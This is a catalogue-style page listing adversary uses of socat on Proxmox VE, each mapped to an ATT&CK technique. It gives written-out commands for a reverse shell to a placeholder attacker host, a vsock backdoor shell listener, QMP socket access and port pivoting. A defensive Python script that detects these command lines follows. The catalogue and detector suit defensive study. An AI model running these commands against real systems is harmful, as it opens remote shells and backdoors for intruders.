socat

socat is a multipurpose relay tool available on Proxmox VE systems. It can create bidirectional data channels between various endpoints including files, sockets, and network connections. Adversaries can leverage socat for vsock covert channels between host and guests, port forwarding, and establishing reverse shells.

Command and Control

  1. Connect to a vsock listener on a VM using its CID (Context ID).

    socat - VSOCK-CONNECT:{cid}:{port}

    Use Case: Establish covert communication channel with a VM bypassing network monitoring.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1572
    Tags: Covert Channel, vsock

  2. Establish a reverse shell connection.

    socat EXEC:/bin/bash TCP:{attacker}:{port}

    Use Case: Create reverse shell to attacker-controlled infrastructure.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059.004

Execution

  1. Create a vsock listener that spawns a shell on connection.

    socat VSOCK-LISTEN:{port},fork EXEC:/bin/bash

    Use Case: Establish a backdoor shell accessible via vsock from guest VMs.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059.004
    Tags: Persistence, vsock

  2. Connect to QEMU Machine Protocol socket for direct VM control.

    socat UNIX-CONNECT:/run/qemu-server/{vmid}.qmp -

    Use Case: Direct QEMU control for advanced VM manipulation bypassing Proxmox APIs.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059

Lateral Movement

  1. Bridge a TCP port to a vsock connection for network pivoting.

    socat TCP-LISTEN:{port},fork VSOCK-CONNECT:{cid}:{vport}

    Use Case: Pivot network traffic through vsock to reach isolated guest VMs.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1090

  2. Create a TCP port forwarder.

    socat TCP-LISTEN:{port},fork TCP:{target}:{tport}

    Use Case: Establish port forwarding for lateral movement or exfiltration.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1090.001
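
The command forms listed above map directly onto process command-line detections. The following is an added example, not code from the original page or its project: it classifies socat invocations by their two address arguments and tags each hit with the technique ID the page assigns. The sample command lines (CIDs, ports, IP addresses, VM ID) are constructed, and the function name and labels are hypothetical.

```python
import os
import re
import shlex

# socat address keywords grouped by role (keywords are case-insensitive).
SHELL = {"EXEC", "SYSTEM"}
TCP_OUT = {"TCP", "TCP4", "TCP6", "TCP-CONNECT"}
TCP_IN = {"TCP-LISTEN", "TCP-L", "TCP4-LISTEN", "TCP6-LISTEN"}
UNIX_OUT = {"UNIX", "UNIX-CONNECT", "UNIX-CLIENT"}
QMP_PATH = re.compile(r"/run/qemu-server/[^/,]+\.qmp$")

# Constructed process command lines, e.g. as recovered from exec auditing.
SAMPLE = [
    "socat - VSOCK-CONNECT:3:4444",
    "/usr/bin/socat VSOCK-LISTEN:9000,fork EXEC:/bin/bash",
    "socat EXEC:/bin/bash TCP:192.0.2.10:443",
    "socat UNIX-CONNECT:/run/qemu-server/101.qmp -",
    "socat -d -d TCP-LISTEN:8080,fork VSOCK-CONNECT:3:80",
    "socat TCP-LISTEN:8443,fork TCP:198.51.100.7:443",
    "socat -u FILE:/var/log/syslog STDOUT",
]

def classify(cmdline):
    """Return (label, ATT&CK technique) for a socat command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: cannot be parsed, skip
        return None
    if len(argv) < 3 or os.path.basename(argv[0]) != "socat":
        return None
    kinds = set()
    for addr in argv[-2:]:  # socat [options] <address> <address>
        keyword, _, param = addr.split(",", 1)[0].partition(":")
        is_qmp = keyword.upper() in UNIX_OUT and QMP_PATH.search(param)
        kinds.add("QMP" if is_qmp else keyword.upper())
    rules = [  # ordered: most specific first
        ("VSOCK-LISTEN" in kinds and kinds & SHELL, "vsock shell listener", "T1059.004"),
        (kinds & SHELL and kinds & TCP_OUT, "reverse shell over TCP", "T1059.004"),
        ("QMP" in kinds, "direct QMP socket access", "T1059"),
        (kinds & TCP_IN and "VSOCK-CONNECT" in kinds, "TCP-to-vsock bridge", "T1090"),
        (kinds & TCP_IN and kinds & TCP_OUT, "TCP port forwarder", "T1090.001"),
        ("VSOCK-CONNECT" in kinds, "vsock client connection", "T1572"),
    ]
    return next(((label, tid) for hit, label, tid in rules if hit), None)

if __name__ == "__main__":
    for line in SAMPLE:
        print(f"{classify(line)!s:45} {line}")
```

Hits are triage leads rather than verdicts: baseline them against socat use that is normal on the host before alerting.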